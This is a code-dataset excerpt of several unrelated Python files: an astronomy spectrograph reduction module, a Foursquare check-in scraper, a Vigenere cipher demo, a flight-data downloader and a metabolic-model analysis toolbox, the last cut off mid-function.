id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
5050979 | import matplotlib
matplotlib.use("Agg")
from astropy.io import fits as pyfits
import numpy as np
import scipy
from scipy import optimize
import copy
import glob
import os
import matplotlib.pyplot as plt
import sys
sys.path.append("../utils/GLOBALutils")
import GLOBALutils
import pycurl
def MedianCombine(ImgList, ZF=0.):
    """
    Median-combine a list of CORALIE FITS images.

    Parameters
    ----------
    ImgList : list of str
        Paths to the FITS files to combine.
    ZF : float, optional
        Zero (bias) level subtracted from every overscan-trimmed frame.

    Returns
    -------
    (ndarray, float, float)
        The median-combined image, the effective read-out noise and the
        detector gain; noise and gain are taken from the first frame's header.

    Raises
    ------
    ValueError
        If ImgList is empty.
    """
    n = len(ImgList)
    if n == 0:
        raise ValueError("empty list provided!")

    hdulist = pyfits.open(ImgList[0])
    h = hdulist[0]
    d = OverscanTrim(h.data) - ZF
    # Empirical noise penalty of a median vs. a mean combination; for fewer
    # than 3 frames the median is equivalent to the mean, so no penalty.
    factor = 1.25 if n >= 3 else 1
    ronoise = factor * h.header['HIERARCH ESO CORA CCD RON'] / np.sqrt(n)
    gain = h.header['HIERARCH ESO CORA CCD GAIN']
    hdulist.close()  # bug fix: the original never closed any FITS file it opened

    if n == 1:
        return d, ronoise, gain

    for name in ImgList[1:]:
        hdulist = pyfits.open(name)
        d = np.dstack((d, OverscanTrim(hdulist[0].data) - ZF))
        hdulist.close()
    return np.median(d, axis=2), ronoise, gain
def OverscanTrim(d):
    """
    Overscan-correct and trim a refurbished CORALIE frame.

    The bias shows no significant structure, so a single scalar level —
    the mean of the medians of the two overscan strips (columns 0:49 and
    2097:2146) — is subtracted from the science region (columns 50:2097).
    """
    left_strip = np.median(d[:, 0:49])
    right_strip = np.median(d[:, 2097:2146])
    level = 0.5 * (left_strip + right_strip)
    return d[:, 50:2097] - level
def getObName(h):
    """
    Determine the object name for exposure *h* (an open FITS HDU list).

    The primary source is the OBS REFNOCOD header card (with two known
    historical typos corrected).  If it holds the placeholder '9999.999',
    the OBS TARG CODE card is tried; as a last resort the telescope
    coordinates are resolved against SIMBAD, and if SIMBAD has no match a
    'J_...' name is built from the catalogue RA/DEC strings.

    Raises ValueError if the RA hour field has an unexpected length.
    """
    obname = h[0].header['HIERARCH ESO OBS REFNOCOD'].upper().replace(' ', '')
    # Read but unused; kept so a missing OBSERVER card still raises as before.
    observer = h[0].header['OBSERVER']
    # Known typos made at the telescope:
    if obname == 'H726273':
        obname = 'HD72673'
    if obname == 'HAT':
        obname = 'HATS563-036'
    if obname == '9999.999':
        # try the header that James usually uses:
        obname = h[0].header['HIERARCH ESO OBS TARG CODE'].upper().replace(' ', '')
    if obname == '9999.999':
        # Observer was too lazy to type a name, so query SIMBAD by position.
        # Bug fix: tempfile and StringIO were used here without being imported
        # anywhere in the module, so this branch always raised NameError.
        # (This module targets Python 2, hence the StringIO module.)
        import tempfile
        import StringIO
        (th, tfile) = tempfile.mkstemp(prefix='CP', text=True)
        tf = open(tfile, 'w')
        tf.write("output console=off\n")
        tf.write("output script=off\n")
        tf.write("output error=merge\n")
        tf.write("set limit 1\n")
        tf.write("format object fmt1 \"%IDLIST(HD|HIP|1) | %OTYPELIST(S) | %SP(S)\"\n")
        tf.write("result full\n")
        tf.write("query sample region(circle, %s %s,5s) & otype='Star'\n" % (h[0].header['HIERARCH ESO TEL TARG ALPHA'], h[0].header['HIERARCH ESO TEL TARG DELTA']))
        # tf.write("set radius 5s\n")
        tf.close()
        # NOTE(review): 'scriptFIle' looks like a typo for 'scriptFile' but is
        # kept as-is; confirm against the SIMBAD sim-script form before changing.
        values = [
            ("scriptFIle", (pycurl.FORM_FILE, tfile))
        ]
        output = StringIO.StringIO()
        c = pycurl.Curl()
        c.setopt(pycurl.URL, "http://simbad.harvard.edu/simbad/sim-script")
        c.setopt(c.HTTPPOST, values)
        c.setopt(pycurl.WRITEFUNCTION, output.write)
        c.perform()
        c.close()
        result = output.getvalue()
        lines = result.split('\n')
        result = lines[len(lines) - 3]
        if result.count('No') > 0:
            # No SIMBAD match: build an alternate obname from RA/DEC strings.
            ra_s = h[0].header['HIERARCH ESO OBS ALPHACAT'].replace('h', '').replace('m', '')
            dec_s = h[0].header['HIERARCH ESO OBS DELTACAT'].replace(':', '')
            hour_l = len(h[0].header['HIERARCH ESO OBS ALPHACAT'].split('h')[0])
            if hour_l == 1:
                obname = 'J_0' + ra_s + dec_s
            elif hour_l == 2:
                obname = 'J_' + ra_s + dec_s
            else:
                raise ValueError("Unexpected length for RA string from header")
        else:
            obname = lines[len(lines) - 3].split('|')[0].replace(" ", "")
        os.close(th)  # bug fix: the mkstemp file descriptor was never closed
        os.remove(tfile)
    return obname
def FileClassify(dir, log):
    """
    Classify every CORALIE*.fits file in *dir* by its template type and
    write a night log of the science exposures to the text file *log*.

    Files listed (one name per line) in dir/bad_files.txt are skipped.

    Returns the same 16-element tuple of lists as before:
    (biases, ob_flats, co_flats, ob_loc, co_loc, ThAr_ref, FP_ref,
     simThAr_sci, simFP_sci, ThAr_ref_dates, ThFP_ref_dates, obnames,
     obnames_FP, exptimes, exptimes_FP, flats)
    """
    # define output lists
    simThAr_sci = []
    simFP_sci = []
    biases = []
    ob_flats = []
    co_flats = []
    ob_loc = []
    co_loc = []
    ThAr_ref = []
    FP_ref = []
    ThAr_ref_dates = []
    ThFP_ref_dates = []
    obnames = []
    obnames_FP = []
    exptimes = []
    exptimes_FP = []
    flats = []

    f = open(log, 'w')

    # Optional manual veto list; stored as a set for O(1) membership tests
    # (the original re-scanned the whole list for every file).
    bad_files = set()
    if os.access(dir + 'bad_files.txt', os.F_OK):
        bf = open(dir + 'bad_files.txt')
        for line in bf.readlines():
            bad_files.add(dir + line[:-1])
        bf.close()

    for archivo in glob.glob(dir + "/CORALIE*fits"):
        if archivo in bad_files:
            continue
        h = pyfits.open(archivo)
        # Classify on the instrument template type; look it up once.
        # (The unused `hd = pyfits.getheader(archivo)` of the original,
        # which read every file twice, has been removed.)
        ttype = h[0].header['HIERARCH ESO TPL TYPE']
        if ttype == 'OBTH' or ttype == 'OBFP':
            # Science exposure with simultaneous ThAr/FP: log it.
            obname = getObName(h)
            ra = h[0].header['HIERARCH ESO OBS ALPHACAT']
            delta = h[0].header['HIERARCH ESO OBS DELTACAT']
            airmass = h[0].header['HIERARCH ESO OBS TARG AIRMASS']
            texp = h[0].header['HIERARCH ESO OBS TEXP']
            date = h[0].header['HIERARCH ESO CORA SHUTTER START DATE']
            hour = h[0].header['HIERARCH ESO CORA SHUTTER START HOUR']
            line = "%-15s %10s %10s %8.2f %4.2f %8s %7.4f %s\n" % (obname, ra, delta, texp, airmass, date, hour, archivo)
            f.write(line)
            simThAr_sci.append(archivo)
            obnames.append(obname)
            exptimes.append(texp)
        elif ttype == 'BIAS':
            biases.append(archivo)
        elif ttype == 'FFO':
            ob_flats.append(archivo)
        elif ttype == 'FFC':
            co_flats.append(archivo)
        elif ttype == 'FF2':
            flats.append(archivo)
        elif ttype == 'LOCO':
            ob_loc.append(archivo)
        elif ttype == 'LOCC':
            co_loc.append(archivo)
        elif ttype == 'THA2':
            ThAr_ref.append(archivo)
            mjd, mjd0 = mjd_fromheader(h)
            ThAr_ref_dates.append(mjd)
        elif ttype == 'THFP':
            FP_ref.append(archivo)
            mjd, mjd0 = mjd_fromheader(h)
            ThFP_ref_dates.append(mjd)
        h.close()  # bug fix: the original leaked every HDU list it opened

    f.close()
    return biases, ob_flats, co_flats, ob_loc, co_loc, ThAr_ref, FP_ref, simThAr_sci, simFP_sci, ThAr_ref_dates, ThFP_ref_dates, obnames, obnames_FP, exptimes, exptimes_FP, flats
def mjd_fromheader(h):
    """
    Return the flux-weighted modified Julian date of an exposure.

    Returns (mjd, mjd0): mjd0 is the MJD at 0h UT on the observation
    date, and mjd adds the shutter-open time plus the flux-weighted
    fraction of the exposure (from the photometer's mean-flux time).
    """
    date_str = h[0].header['HIERARCH ESO CORA SHUTTER START DATE']
    ut_hours = h[0].header['HIERARCH ESO CORA SHUTTER START HOUR']
    year, month, day = int(date_str[0:4]), int(date_str[4:6]), int(date_str[6:8])
    mjd0, mjd, flag = GLOBALutils.iau_cal2jd(year, month, day)
    # Effective mid-exposure fraction as measured by the exposure meter.
    weight = h[0].header['HIERARCH ESO CORA PM FLUX TMMEAN']
    texp = h[0].header['HIERARCH ESO OBS TEXP']  # seconds
    seconds_per_day = 24 * 3600.0
    mjd = mjd + ut_hours / 24.0 + (weight * texp) / seconds_per_day
    return mjd, mjd0
def XC_Final_Fit_Rot( X, Y, ldc = 0.8, vsini = 10.0 ):
    """
    Fit a rotationally-broadened Gaussian absorption profile to a
    cross-correlation function.

    X, Y are the velocity grid and CCF values; ldc is the linear
    limb-darkening coefficient and vsini the initial guess for the
    projected rotational velocity.  Returns the best-fit parameter
    vector p1 = [amplitude, rv, vsini, sigma] and the fitted model
    evaluated on X.
    """
    f0 = 0.1
    # NOTE(review): len(X)/2 relies on Python 2 integer division; under
    # Python 3 this would be a float and indexing would raise TypeError.
    vel0 = X[len(X)/2]
    def conv(x,g,x1,r1):
        # Discrete circular convolution of g with the kernel r1,
        # implemented by rolling r1 one sample per output element.
        xi = np.argmin(x1**2)
        r1 = np.hstack((r1[xi:],r1[:xi]))
        tg = np.zeros(len(g))
        for i in range(len(x)):
            tg[i] = np.add.reduce(g*r1)*(x[1]-x[0])
            r1 = np.hstack((r1[-1:],r1[:-1]))
        return tg
    def fitfunc(p,x,e):
        # p = [amplitude, radial velocity, vrot, Gaussian sigma];
        # e is the limb-darkening coefficient.
        A = p[0]
        rv = p[1]
        vrot = p[2]
        s = p[3]
        # Normalised Gaussian centred on the radial velocity.
        g1 = np.exp(-0.5*((x-rv)/s)**2)/np.sqrt(2*np.pi*s*s)
        d = x[1]-x[0]
        x1 = np.arange(len(x))*d
        x1 -= int(np.round(x1.mean()))
        I = np.where(x1**2 < vrot**2)[0]
        # Broadening kernel with a sqrt term scaled by (1-e) and a
        # parabolic term scaled by e, non-zero only for |x1| < vrot —
        # presumably the standard rotational-broadening kernel with
        # linear limb darkening; confirm against the reference used.
        c1 = 2.*(1. - e) / (np.pi * vrot * (1. - e/3.))
        c2 = .5 * e / (vrot * (1.-e/3.))
        r1 = np.zeros(len(x1))
        r1[I] = (c1*np.sqrt(1.-(x1[I]/vrot)**2) + c2*(1. - (x1[I]/vrot)**2))
        prof = conv(x,g1,x1,r1)
        # Absorption profile: continuum at 1 minus the scaled profile.
        ret = 1. - A*prof
        return ret
    def errfunc(p, x, y, ldc):
        # Residuals for leastsq, plus a soft penalty ("clutch") that keeps
        # the fitted velocity inside the sampled velocity range.
        clutch = 0.0
        mean = p[1]
        if (mean < np.min(x)):
            clutch = 1e10*(1.0 - np.exp(-np.abs(mean-np.min(x)) / 3) )
        if (mean > np.max(x)):
            clutch = 1e10*(1.0 - np.exp(-np.abs(mean-np.max(x)) / 3) )
        return np.ravel( (fitfunc(p,x,ldc) - y) ) + clutch
    # Initial guess: unit amplitude, central velocity, given vsini, sigma=1.
    p0 = np.array( [1.,vel0,vsini,1.] )
    p1, success = scipy.optimize.leastsq(errfunc,p0, args=(X,Y,ldc))
    #plt.plot(X,Y)
    #plt.plot(X, 1. - p1[0]*np.exp(-0.5*((X-p1[1])/p1[3])**2)/np.sqrt(2*np.pi*p1[3]*p1[3]))
    # The r1 computed below is only used by the commented-out debug plots.
    c1 = 2.*(1. - ldc) / (np.pi * p1[2] * (1. - ldc/3.))
    c2 = .5 * ldc / (p1[2] * (1.-ldc/3.))
    I = np.where(X**2 < p1[2]**2)[0]
    r1 = np.zeros(len(X))
    r1[I] = (c1*np.sqrt(1.-(X[I]/p1[2])**2) + c2*(1. - (X[I]/p1[2])**2))
    #plt.plot(X, 1. - p1[0]*r1)
    #plt.show()
    return p1, fitfunc(p1,X,ldc)
def get_ldc(T, G, Z, M, ldfile='lin_coe_sloan2.dat'):
    """
    Look up the linear limb-darkening coefficient of the table row whose
    stellar parameters are closest to (T, G, Z).

    The table (loaded with np.loadtxt) has log g in column 1, Teff in
    column 2, metallicity in column 3 and the coefficient in column 5.
    The distance metric is the sum of the relative absolute differences
    in Teff, log g and |Z|.  M is unused but kept for interface
    compatibility with existing callers.
    """
    f = np.loadtxt(ldfile)
    # np.sqrt(x**2) in the original is just |x|; use np.abs directly.
    dist = (np.abs(T - f[:, 2]) / T
            + np.abs(G - f[:, 1]) / G
            + np.abs(Z - f[:, 3]) / np.abs(Z))
    I = np.argmin(dist)
    return f[I][5]
| StarcoderdataPython |
6529516 | <reponame>kyzima-spb/django-adminlte-full
from django.contrib import admin
from . import models
# Make the menu container and menu item models editable in the Django admin UI.
admin.site.register(models.MenuModel)
admin.site.register(models.MenuItemModel)
| StarcoderdataPython |
181774 | <reponame>eugenejen/hr-py-boilerplate
"""
test runner
"""
from hr_problem.main import main
def test_main():
""" test """
input_data = ''
output_data = main(input_data)
expected_data = ''
assert expected_data == output_data
| StarcoderdataPython |
4978810 | <reponame>edupyter/EDUPYTER38<filename>Lib/site-packages/ipykernel/log.py
import warnings
from zmq.log.handlers import PUBHandler
# Warn at import time: this module has moved to ipyparallel.engine.log.
# stacklevel=2 attributes the warning to the importing module.
warnings.warn(
    "ipykernel.log is deprecated. It has moved to ipyparallel.engine.log",
    DeprecationWarning,
    stacklevel=2,
)
class EnginePUBHandler(PUBHandler):
    """A simple PUBHandler subclass that sets root_topic"""

    engine = None

    def __init__(self, engine, *args, **kwargs):
        super(EnginePUBHandler, self).__init__(*args, **kwargs)
        self.engine = engine

    @property  # type:ignore[misc]
    def root_topic(self):
        """this is a property, in case the handler is created
        before the engine gets registered with an id"""
        engine_id = getattr(self.engine, "id", None)
        if isinstance(engine_id, int):
            return "engine.%i" % engine_id
        return "engine"
| StarcoderdataPython |
class CryptoStats:
    """POJO which contains trading stats for a currency pair"""

    def __init__(self, open: float = 0.0, high: float = 0.0, low: float = 0.0,
                 volume: float = 0.0, last: float = 0.0, volume30d: float = 0.0):
        # Session price statistics
        self.open = open
        self.high = high
        self.low = low
        self.last = last
        # Traded volume (24h) and trailing 30-day volume
        self.volume = volume
        self.volume30d = volume30d
12844115 | import requests
from bs4 import BeautifulSoup
import simplejson as json
import config
import pymysql
# Shared MySQL connection used by the whole script.
# NOTE(review): 'global' statements at module level are no-ops.
global database_conn
global database_cursor
database_conn = pymysql.connect(host = config.db_host, user = config.db_user, passwd = config.db_pass, db = config.db_database, use_unicode=True, charset="utf8")
database_cursor = database_conn.cursor()

# Foursquare API parameters; limit=250 requests the maximum page size.
param = {
    'client_id': config.client_id,
    'client_secret': config.client_secret,
    'oauth_token': config.access_token,
    'limit': '250',
    'v': '20170625'
}

# All user ids already stored in the database.
sql = "select distinct uid from user;"
database_cursor.execute(sql)
results = database_cursor.fetchall()
uids = [uid[0] for uid in results]

# All restaurant ids (fetched but not used below).
sql = "select distinct rid from restaurant;"
database_cursor.execute(sql)
results = database_cursor.fetchall()
rids = [rid[0] for rid in results]

# For each known user, fetch their check-ins and insert (uid, rid) pairs.
for uid in uids:
    offset = 0
    count = -1
    # Keep fetching while the last page looked full (250 items).
    # NOTE(review): 'offset' is never incremented, so a response with
    # count == 250 re-fetches the same page forever — confirm intent.
    while count == -1 or count == 250:
        checkin_record = []
        param_str = '&'.join(['='.join(i) for i in param.items()])
        req = requests.get('https://api.foursquare.com/v2/users/' + str(uid) + '/checkins?' + param_str + '&offset=' + str(offset))
        soup = BeautifulSoup(req.content, 'html.parser')
        try:
            jdata = json.loads(str(soup))
        except:
            print('Error!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
            continue
        count = jdata['response']['checkins']['count']
        print(count)
        if count != 0:
            for i in jdata['response']['checkins']['items']:
                rid = i['venue']['id']
                checkin_record.append((uid, rid))
            # NOTE(review): the INSERT is built by string concatenation from
            # API-supplied values (SQL-injection prone); consider
            # executemany with placeholders instead.
            lineCheckin = 'insert into checkin (uid, rid) values ' + str(checkin_record)[1:-1] + ';'
            print(lineCheckin)
            database_cursor.execute(lineCheckin)
            database_conn.commit()
database_conn.close() | StarcoderdataPython |
8177213 | <filename>tests/io/complex/__init__.py
from .. import unittest
| StarcoderdataPython |
11339919 | from os import environ
from sys import stdin, stdout
from math import gcd
class Vigenere:
    """Classic Vigenere cipher over the 26-letter uppercase alphabet A-Z.

    The key is assumed to consist of uppercase letters; encrypt() strips
    spaces from the plaintext and upper-cases it first.
    """

    def encrypt(self, txt, key):
        """Return the ciphertext for *txt*: each letter is shifted forward
        by the corresponding (cyclically repeated) key letter."""
        plain = txt.replace(" ", "").upper()
        out = []
        for pos, ch in enumerate(plain):
            k = key[pos % len(key)]
            shift = (ord(ch) - ord('A')) + (ord(k) - ord('A'))
            out.append(chr(shift % 26 + ord('A')))
        return "".join(out)

    def decrypt(self, encry, key):
        """Invert encrypt(): shift each ciphertext letter backward by the
        corresponding (cyclically repeated) key letter."""
        out = []
        for pos, ch in enumerate(encry):
            k = key[pos % len(key)]
            shift = (ord(ch) - ord('A')) - (ord(k) - ord('A'))
            out.append(chr(shift % 26 + ord('A')))
        return "".join(out)
if __name__ == '__main__':
    # Demo: encrypt a sample sentence with key "UNAL", then decrypt it back.
    algo = Vigenere()
    txt = "EL CURSo DE CRIPTOGRAFIA ME ENCANTA"
    key = "UNAL"
    encrypt = algo.encrypt(txt, key)
    print("Encrypt:", encrypt)
    decrypt = algo.decrypt(encrypt, key)
    print("Decrypt", decrypt)
| StarcoderdataPython |
242829 | # Author: <NAME>
# On-Time Performance Data downloader
# Data taken from https://www.transtats.bts.gov/DL_SelectFields.asp?Table_ID=236
# Field descriptions provided https://www.transtats.bts.gov/Fields.asp?Table_ID=236
"""This script downloads weather data from for Ohare Airport from the US Bureau of Transportation
Usage: python download_otp.py
"""
import requests
from selenium import webdriver
import pandas as pd
import numpy as np
import zipfile as zp
from bs4 import BeautifulSoup
import time
import glob
import os
import shutil
def download_otp(url, start_year, end_year):
    """
    Drive the BTS on-time-performance download form with Selenium and
    trigger one download per (year, month) in [start_year, end_year].

    Chrome is configured to save downloads to ./data/otp relative to the
    current working directory.
    """
    # path_parent = os.path.dirname(os.getcwd())
    # download_path = os.chdir(path_parent)
    # Instantiate browser, sending Chrome downloads to ./data/otp
    chrome_options = webdriver.ChromeOptions()
    prefs = {'download.default_directory' : os.getcwd()+'/data/otp'}
    chrome_options.add_experimental_option('prefs', prefs)
    driver = webdriver.Chrome(chrome_options=chrome_options)
    driver.get(url)
    # STEP 1. LOCATE DOWNLOAD BUTTON
    download_bt = driver.find_element_by_xpath('//*[@id="content"]/table[1]/tbody/tr/td[2]/table[3]/tbody/tr/td[2]/button[1]')
    # STEP 2. SELECT FIELDS OF INTEREST (IGNORING DEFAULTS)
    # NOTE(review): these absolute XPaths are tied to one specific page
    # layout and will break silently if the BTS site markup changes.
    # DAY_OF_WEEK
    driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[7]/td[1]/input').click()
    # FLIGHT_DATE
    driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[8]/td[1]/input').click()
    # OP_UNIQUE_CARRIER
    driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[10]/td[1]/input').click()
    # TAIL_NUM
    driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[13]/td[1]/input').click()
    # FLIGHT_NUM
    driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[14]/td[1]/input').click()
    # ORIGIN
    driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[19]/td[1]/input').click()
    # DEST
    driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[29]/td[1]/input').click()
    # ARR_TIME
    driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[49]/td[1]/input').click()
    # ARR_DELAY
    driver.find_element_by_xpath('/html/body/div[3]/div[3]/table[1]/tbody/tr/td[2]/table[4]/tbody/tr[50]/td[1]/input').click()
    # STEP 3. LOOP OVER YEARS OF INTEREST
    # FIND DROPDOWN FOR SELECTABLE YEARS
    year_sel = driver.find_element_by_id("XYEAR")
    all_years = year_sel.find_elements_by_tag_name("option")
    targ_years= list(range(start_year,end_year+1,1))
    month_sel = driver.find_element_by_id("FREQUENCY")
    all_months = month_sel.find_elements_by_tag_name("option")
    # OUTER LOOP FOR EACH YEAR
    for year in all_years:
        if int(year.get_attribute("value")) in targ_years:
            print(year.get_attribute("value"))
            year.click()
            for month in all_months:
                month.click()
                print(month.get_attribute("value"))
                # EXECUTE DOWNLOAD
                download_bt.click()
                # Crude fixed wait for the download to finish before the
                # next request is triggered.
                time.sleep(15)
def aggregate_data(path):
    """
    Extract every downloaded .zip archive under *path*, keep only the rows
    for Chicago O'Hare (DEST == "ORD") from the CSV inside each archive,
    and write a single combined CSV to data/ORD_OTP.csv (relative to the
    current working directory).

    Fixes over the original: each archive is opened exactly once (the
    original opened every zip a second time without ever closing the
    second handle), and the temporary extraction directory is removed
    even if reading the CSV fails.
    """
    entries = []
    for zip_filename in glob.glob(path + '/*.zip'):
        # Extract next to the archive, into a directory named after it.
        dir_name = os.path.splitext(zip_filename)[0]
        os.mkdir(dir_name)
        try:
            with zp.ZipFile(zip_filename, "r") as zip_handler:
                zip_handler.extractall(dir_name)
            # Only the current extraction dir contains CSVs at this point.
            csv_file = glob.glob(path + '/*/*.csv')
            entries.append(pd.read_csv(csv_file[0]).query('DEST == "ORD"'))
        finally:
            shutil.rmtree(dir_name, ignore_errors=False, onerror=None)
    combined_csvs = pd.concat(entries)
    combined_csvs.to_csv('data/ORD_OTP.csv')
def main():
    """Download 2013-2020 on-time-performance data, then aggregate the
    O'Hare rows into a single CSV."""
    # # Set month and year parameters
    # Months = list(range(1,13,1))
    # Months = list(map(str,Months))
    # targ_years= list(range(2013,2020,1))
    # targ_years = list(map(str,targ_years))
    TARGET = 'https://www.transtats.bts.gov/DL_SelectFields.asp?Table_ID=236'
    download_otp(TARGET, 2013, 2020)
    aggregate_data('data/otp')
# script entry point
if __name__ == '__main__':
main() | StarcoderdataPython |
344747 | <filename>python/analysis_toolbox.py<gh_stars>0
import numpy as np
import matplotlib.pyplot as plt
from optknock import OptKnock
################################################################################
# HTML output tools #
################################################################################
def model_summary(model, solution, html):
    """Render a full HTML report for *solution*: the exchange-reaction
    table first, then one reaction table per metabolite."""
    flux_by_reaction = {model.reactions[i]: solution.x[i]
                        for i in range(len(model.reactions))}
    display_exchange_reactions(model, flux_by_reaction, html)
    for met in model.metabolites:
        display_metabolite_reactions(model, met, flux_by_reaction, html)
def display_exchange_reactions(model, reaction2flux_dict, html):
    """Write an HTML table of all non-zero exchange fluxes, colour-coded
    by flux magnitude and sorted by signed flux."""
    # section header
    html.write('<br />\n')
    html.write('<a name="EXCHANGE"></a>\n')
    html.write('Exchange reactions: <br />\n')
    html.write('<br />\n')
    titles = ['Sub System', 'Reaction Name', 'Reaction ID',
              'Reaction', 'LB', 'UB', 'Reaction Flux']
    # fluxes: one row per exchange reaction carrying a non-negligible flux
    rowdicts = []
    for r in model.reactions:
        if r.subsystem not in ['', 'Exchange']:
            continue
        if abs(reaction2flux_dict[r]) < 1e-10:
            continue
        direction = np.sign(reaction2flux_dict[r])
        d = {'Sub System': 'Exchange', 'Reaction Name': r.name,
             'Reaction ID': r.id,
             'Reaction': display_reaction(r, None, direction),
             'LB': '%g' % r.lower_bound,
             'UB': '%g' % r.upper_bound,
             'Reaction Flux': '%.2g' % abs(reaction2flux_dict[r]),
             'sortkey': reaction2flux_dict[r]}
        rowdicts.append(d)
    # add a zero row (separating forward and backward) and sort the
    # rows according to the net flux
    rowdicts.append({'sortkey': 0})
    rowdicts.sort(key=lambda x: x['sortkey'])
    # add color to the rows (gradient normalised by the largest |flux|)
    max_flux = max([abs(d['sortkey']) for d in rowdicts])
    rowcolors = [color_gradient(d['sortkey']/max_flux) for d in rowdicts]
    html.write_table(rowdicts, titles, rowcolors=rowcolors)
def display_metabolite_reactions(model, m, reaction2flux_dict, html):
    """Write an HTML section for metabolite *m*: every reaction touching
    it with a non-zero flux, sorted by the net flux of *m* through each
    reaction.  Writes nothing when no such reaction exists."""
    # metabolite header with an anchor so reaction tables can link here
    html.write('<br />\n')
    html.write('<a name="%s"></a>\n' % m.id)
    html.write('Metabolite name: ' + m.name + '<br />\n')
    html.write('Metabolite ID: ' + m.id + '<br />\n')
    html.write('Compartment: ' + m.compartment + '<br />\n')
    html.write('<br />\n')
    titles = ['Sub System', 'Reaction Name', 'Reaction ID',
              'Reaction', 'LB', 'UB', 'Reaction Flux', 'Net Flux']
    # fluxes
    rowdicts = []
    for r in m.get_reaction():
        if abs(reaction2flux_dict[r]) < 1e-10:
            continue
        direction = np.sign(reaction2flux_dict[r])
        # flux of m through r: reaction flux times m's stoichiometric coefficient
        net_flux = reaction2flux_dict[r] * r.get_coefficient(m)
        d = {'Sub System': r.subsystem, 'Reaction Name': r.name,
             'Reaction ID': r.id,
             'Reaction': display_reaction(r, m, direction),
             'LB': '%g' % r.lower_bound,
             'UB': '%g' % r.upper_bound,
             'Reaction Flux': '%.2g' % abs(reaction2flux_dict[r]),
             'Net Flux': '%.2g' % net_flux,
             'sortkey': -net_flux}
        rowdicts.append(d)
    if rowdicts == []:
        return
    # add a zero row (separating forward and backward) and sort the
    # rows according to the net flux
    rowdicts.append({'sortkey': 0})
    rowdicts.sort(key=lambda x: x['sortkey'])
    # add color to the rows (gradient normalised by the largest |flux|)
    max_flux = max([abs(d['sortkey']) for d in rowdicts])
    rowcolors = [color_gradient(d['sortkey']/max_flux) for d in rowdicts]
    html.write_table(rowdicts, titles, rowcolors=rowcolors)
def display_reaction(r, m_bold=None, direction=1):
    """
    Return an HTML string for reaction *r*, linking each metabolite to
    its anchor and bolding *m_bold* if given.  direction == 1 prints
    substrates on the left; any other value swaps the two sides.
    """
    left_terms = []
    right_terms = []
    for met in r.get_reactants() + r.get_products():
        if met == m_bold:
            anchor = "<a href='#%s'><b>%s</b></a>" % (met.id, met.id)
        else:
            anchor = "<a href='#%s'>%s</a>" % (met.id, met.id)
        coeff = r.get_coefficient(met)
        # omit stoichiometric coefficients of 1 for readability
        term = anchor if abs(coeff) == 1 else ("%g " % abs(coeff)) + anchor
        if coeff < 0:
            left_terms.append(term)
        else:
            right_terms.append(term)
    if direction == 1:
        return ' + '.join(left_terms) + ' ⇋ ' + ' + '.join(right_terms)
    return ' + '.join(right_terms) + ' ⇋ ' + ' + '.join(left_terms)
def color_gradient(x):
    """
    Map a signed intensity x in [-1, 1] to a hex RGB string: shades of
    red for positive x, shades of green for negative x, and a fixed grey
    for zero.  Larger |x| gives a more saturated colour.
    """
    if x == 0:
        return '%.2x%.2x%.2x' % (100, 100, 100)
    grad = 220 - abs(x) * 80
    if x > 0:
        return '%.2x%.2x%.2x' % (255, grad, grad)
    return '%.2x%.2x%.2x' % (grad, 255, grad)
################################################################################
# plotting tools #
################################################################################
def plot_phase(model, pivot_reaction_id):
    """Scan the flux of *pivot_reaction_id* from 0 to 99 (pinning it with
    equal lower/upper bounds), solve the FBA at each point, and plot the
    objective value against the pinned flux.  Returns the figure."""
    ok = OptKnock(model)
    r_pivot = ok.get_reaction_by_id(pivot_reaction_id)
    ok.prepare_FBA_primal()
    data = []
    for f in np.arange(0, 100, 1):
        # pin the pivot reaction's flux to exactly f
        ok.var_v[r_pivot].lowBound = f
        ok.var_v[r_pivot].upBound = f
        ok.solve()
        # infeasible solves yield None; treat them as 0
        obj = ok.get_objective_value() or 0
        data.append((f, obj))
        # NOTE: Python 2 print statement -- this module predates Python 3
        print "RBC = %.3g, BM = %.3g" % (f, obj)
    data = np.matrix(data)
    fig = plt.figure()
    plt.plot(data[:,1], data[:,0], '-', figure=fig)
    return fig
def get_PPP(model, reaction_id):
    """Return (PPP_data, slope) for *reaction_id*: the phenotypic phase
    plane matrix from OptKnock, and the minimal target flux per unit of
    biomass near zero growth.  An infeasible model yields a small dummy
    matrix and slope = None."""
    ok = OptKnock(model)
    PPP_data = ok.get_PPP_data(reaction_id)
    if PPP_data is None:
        print 'model is infeasible'
        # placeholder so downstream plotting still has something to draw
        PPP_data = np.matrix([[0, 0, 0.05], [0.05, 0, 0]])
        slope = None
    else:
        # calculate the "slope" - i.e. close to 0 biomass production, what is the
        # minimal flux in the target reaction that is required?
        slope = PPP_data[1, 1] / PPP_data[1, 0]
        print slope
    return PPP_data, slope
def plot_multi_PPP(model_dict, reaction_id, ax):
    """
    Draw a comparative Phenotypic Phase Plane plot.
    Arguments:
        model_dict  - a dict mapping a legend label to a cobrapy Model
        reaction_id - the target reaction whose flux is plotted vs. biomass
        ax          - the matplotlib axes to draw on
    Models lacking the reaction, or infeasible models, are skipped with a
    printed warning.  The label 'wild-type' gets special grey styling.
    """
    colors = ['red', 'blue', 'green', 'magenta', 'orange', 'cyan']
    PPP_data_dict = {}
    for label, model in model_dict.iteritems():
        # verify that this model has the pivot reaction:
        if reaction_id not in model.reactions:
            print 'model "%s" does not contain the reaction "%s"' % (label, reaction_id)
            continue
        PPP_data = OptKnock(model).get_PPP_data(reaction_id)
        # verify that this model is feasible (i.e. biomass yield is more than minimal threshold):
        if PPP_data is None:
            print 'model "%s" is infeasible' % label
            continue
        PPP_data_dict[label] = PPP_data
    # shaded band between each model's lower and upper flux envelopes
